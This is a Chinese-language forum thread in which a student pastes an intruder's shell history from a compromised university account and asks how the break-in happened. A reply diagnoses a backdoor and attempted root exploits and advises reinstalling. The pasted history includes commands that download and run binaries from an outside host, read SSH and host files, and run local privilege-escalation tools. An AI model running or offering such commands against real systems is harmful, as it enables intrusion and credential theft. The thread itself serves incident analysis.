|
|---|
|
|
|
|
|
|
y*j
发帖数: 32 | 1 我在学校里面,收发 Email 都喜欢 ssh 到系
服务器上后用 pine。今日忽然发现有人用我的
用户名和密码登陆:黑客太牛了,居然知道我的
密码。而且,他从我的 .ssh 目录下知道我还
ssh 过其他地方,于是他一个一个登陆过去,
都知道用户名和密码!都不知道他是怎么弄的。
幸好他好象也没有干一些坏事情,例如删除文件
发 Email 之类的。下面是我的 .history
各位高手看看怎么回事,怎么解决。
cd .ssh
cat known_hosts
uname -a
w
wget another00.home.ro/ups
chmod +x ups
./ups
wget another00.home.ro/local1.tgz
cd local
tar -xzvf local1.tgz
cd local
./mem
id
./t
./prt
./su
ls
./brk
另一个服务器上的:
#+1093705127
uname -a
#+1093705131
cd .ssh
#+1093705144
cat /etc/hosts
#+1093705173
wget www.ge | z*****y
发帖数: 14 | 2 From your post, it can't tell whether the hacker escalate to root succesfully.
The hacker might have sniffed your usr/passwd. Backdoor was downloaded and
installed, multiple local exploits were attempted to gain root privilege. All
the hosts running samba in your network that are vulnerable probably were
hacked already.
A thorough recovery would be reinstallation.
【在 y*j 的大作中提到】
: 我在学校里面,收发 Email 都喜欢 ssh 到系
: 服务器上后用 pine。今日忽然发现有人用我的
: 用户名和密码登陆:黑客太牛了,居然知道我的
: 密码。而且,他从我的 .ssh 目录下知道我还
: ssh 过其他地方,于是他一个一个登陆过去,
: 都知道用户名和密码!都不知道他是怎么弄的。
: 幸好他好象也没有干一些坏事情,例如删除文件
: 发 Email 之类的。下面是我的 .history
: 各位高手看看怎么回事,怎么解决。
: cd .ssh
|
|
|
|
|
|
|
